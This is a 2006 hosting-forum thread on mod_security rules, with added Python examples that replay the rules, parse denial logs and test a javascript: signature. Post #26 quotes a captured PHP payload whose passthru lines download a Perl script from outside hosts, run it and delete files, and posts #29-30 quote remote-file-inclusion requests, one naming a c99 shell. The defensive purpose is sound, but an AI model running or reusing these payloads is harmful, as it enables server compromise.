Results 26 to 36 of 36
Thread: mod security problem
-
09-10-2006, 02:34 PM #26 Web Hosting Master
- Join Date: May 2003
- Location: Florida
- Posts: 902
Originally Posted by The Blind Can See
Code:
<? passthru('cd /tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
passthru('cd /tmp;lynx -source ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
passthru('cd /tmp;fetch ttp://trendpresent.de/sht >sh;perl sh;rm -f *');
passthru('cd /tmp;GET ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
passthru('cd /dev/shm;wget http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /dev/shm;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /dev/shm;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
passthru('cd /dev/shm;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /dev/shm;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /dev/shm;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /var/tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /var/tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /var/tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
passthru('cd /var/tmp;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /var/tmp;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /var/tmp;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *'); ?>
-
09-10-2006, 02:36 PM #27 Account Suspended
- Join Date: Sep 2006
- Posts: 39
Thanks for the info...here's a question...where did you get these logs from? I didn't post that
-
09-10-2006, 02:53 PM #28 Account Suspended
- Join Date: Sep 2006
- Posts: 39
Here is more...
One is for my forum, gives 403 when attempting to save updated vBulletin template
Last edited by The Blind Can See; 09-10-2006 at 02:57 PM.
-
09-10-2006, 02:58 PM #29 Web Hosting Master
- Join Date: May 2003
- Location: Florida
- Posts: 902
Originally Posted by The Blind Can See
==23bb7470==============================
Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] "GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
----------------------------------------
GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1
Connection: TE, close
Host: www.hosteddomain.com
TE: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.805
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
If you check that link, it is what I posted.
-
09-10-2006, 03:02 PM #30 Web Hosting Master
- Join Date: May 2003
- Location: Florida
- Posts: 902
Originally Posted by The Blind Can See
GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster.f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt
I imagine the rule stopping your update is the one with alter|create|drop in it. You can either turn that rule off, allow it for your site only, or turn it off only when you need to update the theme.
-
09-10-2006, 03:05 PM #31 Account Suspended
- Join Date: Sep 2006
- Posts: 39
Thanks..... that is the same line that gave me the 403 in my site
Code:
#Generic SQL sigs
SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
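The two rules discussed in posts #29 and #31 (300018 on REQUEST_URI, 300015 on ARGS), replayed against the requests quoted in this thread and against a constructed vBulletin template save. This is an added example, not code from the thread or from mod_security; it translates the two regexes to Python (`[[:space:]]` becomes `\s`) and assumes case-insensitive matching, which is how mod_security 1.x applied its filters. The template-save body and the search body are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The two SecFilterSelective rules quoted in this thread, translated from
# mod_security 1.x syntax to Python re. mod_security 1.x matched
# case-insensitively; that is assumed here.
RULES = {
    "300018": ("REQUEST_URI",
               r"\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)",
               "Generic PHP code injection protection"),
    "300015": ("ARGS",
               r"((alter|create|drop)\s+(column|database|procedure|table)"
               r"|delete\s+from|update.+set.+=)",
               "Generic SQL injection protection"),
}
COMPILED = {rid: (target, re.compile(pat, re.IGNORECASE), msg)
            for rid, (target, pat, msg) in RULES.items()}


def args_of(uri, body=""):
    """Decoded argument values from the query string and a form-encoded
    POST body: the view that mod_security's ARGS target inspects."""
    pairs = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return [value for _, value in pairs]


def evaluate(uri, body=""):
    """Return the ids of the rules that would deny this request."""
    hits = []
    for rid, (target, rx, _msg) in COMPILED.items():
        if target == "REQUEST_URI":
            matched = rx.search(uri) is not None
        else:  # ARGS
            matched = any(rx.search(v) for v in args_of(uri, body))
        if matched:
            hits.append(rid)
    return hits


# Request lines taken from the thread (the header.inc.php RFI and the
# c99shell attempt) and bodies constructed for this example.
RFI = ("/forum//calendar/setup/header.inc.php"
       "?serverPath=http://trendpresent.de/images/root.txt?")
C99 = ("/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster"
       ".f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt")
# Constructed: a template whose HTML contains "Update ... settings ... ="
TEMPLATE_SAVE_BODY = ("do=updatetemplate&templateid=42&template="
                      "%3Cp%3EUpdate+your+settings%3A+%3Cinput+name%3D%22x%22%3E%3C%2Fp%3E")
# Constructed: a real injection attempt in a search form
SQLI_BODY = "q=1%3B+DROP+TABLE+user--"

if __name__ == "__main__":
    for label, uri, body in [("RFI", RFI, ""), ("c99", C99, ""),
                             ("template save", "/forum/admincp/template.php", TEMPLATE_SAVE_BODY),
                             ("sqli", "/forum/search.php", SQLI_BODY),
                             ("benign", "/forum/index.php?page=home", "")]:
        print(f"{label:14s} -> {evaluate(uri, body)}")
```

Two things worth noticing when you run it. Rule 300018 keys on a `?` or `&` after the remote URL, which is the trailing `?` attackers append to discard whatever the script concatenates onto the include path; the aedatingCMS request quoted in post #30 has no such trailer and slips past that rule, so it is not a complete RFI signature. And the template save is stopped by the `update.+set.+=` branch of 300015, which needs nothing more than the words "update" and "set" followed by an `=` somewhere in one argument; that is why editing templates, which carry HTML attributes, trips it and why post #34's per-vhost `SecFilterRemove 300015` is the usual remedy.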
-
09-10-2006, 03:11 PM #32 Account Suspended
- Join Date: Sep 2006
- Posts: 39
By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?
-
09-10-2006, 03:22 PM #33 Web Hosting Master
- Join Date: May 2003
- Location: Florida
- Posts: 902
Originally Posted by The Blind Can See
SecFilterDefaultAction "deny,log,status:403"
To something like:
SecFilterDefaultAction "deny,log,redirect:http://www.google.com"
This would redirect them to google instead of your site. I guess you could also direct them to somebody better. Won't stop them.
It would be good if somebody would write a mod_security rule that adds them to the firewall deny.
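Post #33 asks for a rule that adds offenders to the firewall deny list. mod_security 1.x cannot call out to the firewall on its own; the usual way is a watcher that reads the denials out of the logs and blocks repeat offenders. Below is an added example of that, not code from the thread or from any project: Python that understands the two log formats shown in this thread (the audit-log `Request:` line from post #29 and the error-log `mod_security: Access denied` line from post #35), counts denials per client, and emits iptables commands as text rather than executing them. The first sample line is the one quoted in post #29; the other log lines, the threshold of three denials and the allow list are constructed for the example.

```python
import re
from collections import Counter

# Apache error-log form, as quoted in the author.exe denial
ERROR_DENY = re.compile(
    r"\[client (?P<ip>[^\]]+)\] mod_security: Access denied with code (?P<code>\d{3})"
)
# mod_security 1.x audit-log "Request:" form, as quoted in the header.inc.php denial
AUDIT_REQ = re.compile(
    r'^Request: \S+ (?P<ip>\S+) - - \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)


def denied_clients(lines):
    """Count mod_security denials per client IP across both log formats."""
    counts = Counter()
    for line in lines:
        m = ERROR_DENY.search(line)
        if m:
            counts[m.group("ip")] += 1
            continue
        m = AUDIT_REQ.match(line)
        if m and m.group("status") == "403":
            counts[m.group("ip")] += 1
    return counts


def deny_commands(lines, threshold=3, allowlist=frozenset()):
    """iptables commands (returned as strings, never executed) for every
    client with at least `threshold` denials that is not allow-listed.
    Threshold and allow list are this example's assumptions."""
    counts = denied_clients(lines)
    return [
        f"iptables -I INPUT -s {ip} -j DROP"
        for ip, n in counts.most_common()
        if n >= threshold and ip not in allowlist
    ]


# Constructed sample log, modelled on the two formats in the thread.
# The first line is the audit entry quoted in the thread; the rest are made up.
SAMPLE_LOG = [
    'Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] '
    '"GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" '
    '403 437 "-" "libwww-perl/5.805" - "-"',
    '[Sun Sep 10 13:12:40 2006] [error] [client 70.87.119.68] mod_security: Access denied with code 403. '
    'Pattern match "..." at REQUEST_URI [hostname "www.hosteddomain.com"] [uri "/forum//calendar/setup/header.inc.php"]',
    '[Sun Sep 10 13:12:41 2006] [error] [client 70.87.119.68] mod_security: Access denied with code 403. '
    'Pattern match "..." at REQUEST_URI [hostname "www.hosteddomain.com"] [uri "/chat/inc/cmses/aedatingCMS.php"]',
    'Request: www.hosteddomain.com 203.0.113.7 - - [10/Sep/2006:13:14:10 -0500] '
    '"GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" - "-"',
    '[Sun Sep 10 13:15:02 2006] [error] [client 198.51.100.9] mod_security: Access denied with code 403. '
    'Pattern match "..." at POST_PAYLOAD [hostname "mydomain.com"] [uri "/_vti_bin/_vti_aut/author.exe"]',
    '[Sun Sep 10 13:16:00 2006] [error] [client 203.0.113.7] File does not exist: /var/www/html/favicon.ico',
]

if __name__ == "__main__":
    print(denied_clients(SAMPLE_LOG))
    for cmd in deny_commands(SAMPLE_LOG):
        print(cmd)
```

Keep the threshold above one and put your own address on the allow list before wiring this to a real firewall: the FrontPage publish in post #35 is the site owner tripping the same rules, and a watcher without an allow list would lock them out. Blocks should also expire after a while, since the libwww-perl scanners in this thread come from hosts that are themselves compromised and change hands.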
-
09-10-2006, 10:05 PM #34 Disabled
- Join Date: May 2003
- Location: behind your business
- Posts: 70
Originally Posted by The Blind Can See
<VirtualHost IP:80>
.
.
SecFilterRemove 300015
.
</VirtualHost>
-asc2000-
-
09-10-2006, 10:08 PM #35 Account Suspended
- Join Date: Sep 2006
- Posts: 39
I'll try that... here's another problem. Cannot publish through FrontPage (oddly, it worked a few times and suddenly stopped, AFTER the rules were already applied)
apache log:
[Sun Sep 10 21:02:57 2006] [error] [client xx.xx.xx] mod_security: Access denied with code 403. Pattern match "(((URL|SRC|HREF|LOWSRC)[\\\\s]*=)|(url[\\\\s]*[\\\\(]))[\\\\s]*[\\\\'\\"]*[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*j[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*v[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*s[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*c[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*r[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*i[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*p[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*t[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*[\\\\:]" at POST_PAYLOAD [hostname "mydomain.com"] [uri "/_vti_bin/_vti_aut/author.exe"]
I removed these two from modsec.conf
SecFilterSelective POST_PAYLOAD "cc:"
SecFilterSelective POST_PAYLOAD "cc:\x20"
Still doesn't publish (403 error)
I even added this
###########################################
#Front page exclusions
###########################################
< LocationMatch "/_vti_bin/_vti_aut/author.exe" >
SecFilterInheritance Off
< /LocationMatch >
Caused apache to fail
-
09-10-2006, 10:32 PM #36 Account Suspended
- Join Date: Sep 2006
- Posts: 39
The line causing the 403 is
Code:
SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]"
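The SecFilter in post #36 is a `javascript:` URI signature with optional control characters allowed between the letters, which is why the rule is so long and why it fires on any published page that carries such a link in an `href`, `src` or CSS `url(`. The example below is added here and is not code from the thread or from mod_security: it is the same regex in Python form, run over constructed POST bodies next to a plain substring check, to show what the interleaving is for and where the signature stops. It assumes case-insensitive matching as mod_security 1.x applied it; all sample bodies are made up for the example.

```python
import re

# The rule's optional gap between letters: tab, LF, VT, FF, CR
_GAP = r"[\x09\x0a\x0b\x0c\x0d]*"
# j[gap]*a[gap]*v ... [gap]*t, exactly as the SecFilter spells it out
_JAVASCRIPT = _GAP.join("javascript")

# Python form of the SecFilter regex from the thread; mod_security 1.x
# matched case-insensitively, which is assumed here.
JS_URI_RULE = re.compile(
    r"(((URL|SRC|HREF|LOWSRC)\s*=)|(url\s*\())\s*['\"]*"
    + _GAP + _JAVASCRIPT + _GAP + r":",
    re.IGNORECASE,
)


def naive_check(payload):
    """What a plain substring filter would do."""
    return "javascript:" in payload.lower()


def rule_check(payload):
    """What the thread's SecFilter does."""
    return JS_URI_RULE.search(payload) is not None


# Constructed POST bodies, not taken from the thread
SAMPLES = {
    "plain":   '<a href="javascript:alert(1)">x</a>',
    "gapped":  '<a href="j\x0aava\tscript:alert(1)">x</a>',      # LF and TAB inside the word
    "css_url": '<div style="background:url( javascript:alert(1) )"></div>',
    "entity":  '<a href="&#106;avascript:alert(1)">x</a>',       # HTML entity for "j"
    "benign":  '<a href="page2.htm">Next</a><img src="logo.gif">',
}


def classify(samples=SAMPLES):
    """Map each sample to (naive_check result, rule_check result)."""
    return {name: (naive_check(p), rule_check(p)) for name, p in samples.items()}


if __name__ == "__main__":
    for name, (naive, rule) in classify().items():
        print(f"{name:8s} substring={naive!s:5s} rule={rule!s:5s}")
```

The `gapped` body is the case the control-character classes exist for: browsers of that era tolerated whitespace inside the scheme, so a plain substring match misses it while the rule catches it. The `entity` body shows the other side: the rule looks for the literal letters, so an entity-encoded scheme passes it, and a legitimate page with a `javascript:` link is denied just like an attack. That is the trade-off behind the exclusion post #35 tries to set up for `/_vti_bin/_vti_aut/author.exe`: a signature this broad on POST_PAYLOAD has to be scoped away from publishing endpoints rather than relied on as a complete XSS filter.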